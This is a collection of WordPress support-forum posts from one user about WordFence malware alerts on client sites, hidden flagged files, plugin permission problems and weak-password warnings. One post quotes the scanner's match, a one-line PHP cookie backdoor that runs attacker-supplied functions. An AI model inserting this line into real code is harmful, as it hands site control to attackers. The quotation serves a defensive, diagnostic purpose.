+ES

Hi+

Thank you for the quick response! I have just done that. I could not find the “ticket number” so I put the link to this thread in that box for your reference.

Please let me know if there is anything else you need.

Thanks, +ES

Hi+
Thank you very much for the advice. I was in the process of updating things when I had to restore a backed up version, and then this… I was not certain what to do next. I will proceed with those updates and then post the results here.

Hi+
It has been several days and WordFence still flags 392 files with the same issue as stated above. Also, per my above statements, you see that it is comparing the proper version of WordPress… Please advise.
Thanks!

I found the file & it says “version 4.0” — please advise… thanks!

Okay, I will look for the version of WP that WordFence is using to compare and get back with to you… Thanks!

Hi+
I just ran the scan again – I get the exact same results… Please advise.
Thanks

Thank you

Okay, that was not supposed to be a link… just the letters “FTP”

Thank you Steve… I already have WordFence and BlogVault Security on the sites.

I am in via FTP and looking under “wp-content” which is where WordFence is stating the common.php is located

wp-content/common.php

But I do not see that common.php – so it is difficult to delete if I don’t see it via FTP… Any suggestions?

Thanks!

Hi+

Looking at WordFence, the alert says:

File appears to be malicious: wp-comments-post.php

Filename: wp-comments-post.php
File type: Core
Issue first detected: 4 hours 32 mins ago.
Severity: Critical
Status New

This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);”. The infection type is: Backdoor:PHP/ddksk7.
**
However when I go to “see how the file has changed”, it says:

There are no differences between the original file and the file in the repository.
**

So…should I “restore the original version”? Or delete it entirely? (since it is not part of the WordPress install or upgrade package)

Thank you! +ES

Hello+

I will take a look and see… I will post what I find.

Thank you.

Hello+

@pidengmor (barnez), thank you for clarifying that it really is a malicious file. I do not think “my” hosting account/personal machine/login credentials have been compromised since none of these are on my hosting. All of these are my clients’ websites and each has their own individual accounts, with which ever host provider they prefer. They are not all hosted by the same hosting company. However, ALL got this malicious file AFTER the update to WordPress 4.7.2.

@sterndata, thank you for that suggestion… There is no indication as to where it might have come from (looking via WordFence), only “This file appears to be installed by a hacker to perform malicious activity”… Also, no – they are NOT on the same hosting account.

I am removing that file now…I simply find it VERY suspicious that I updated to the WordPress 4.7.2 and THEN ALL were hacked… I’m just wondering about that…?

Thanks, +ES

Thank you, it is out to you now…

Hi+

I do not understand, there WAS writing permissions BEFORE the update – I did not have an issue with any of it prior to updating your plugin…. How/why did your plugin change those writing permissions when I updated it? (It was the only update that I did at that time.) How do I get the permissions to allow your theme to function as expected (as it used to)?

I did go to Permalink Settings and it DOES save – I can provide you with a screen shot showing that it saved, if you tell me where/how to provide you with the JPG?

Please advise.

Hello+

Thank you for the quick response! Yes, that option was already checked prior to the update and was working perfectly. As stated, only after the update did I get the 1st alert and at that time I went in and verified that it was still checked (it was) and I re-saved (just to be certain) and then several hours later I got another alert about a different subscriber… That is when I reached out to the forum here….However, since you cannot duplicate the issue and are not receiving tons of similar complaints (I assume) then I understand there is not much you can do at this point on your end.

I am worried that the system will allow these users to create new passwords but not force them to make them “very strong” since it previously (somehow) allowed them to make “very weak” passwords, and I do not want to harass my clients about recreating “very strong” passwords (until I stop receiving those alerts from the plugin about them being “very weak”) – do you understand my worries? Do you have any suggestions?

Thanks,
+ES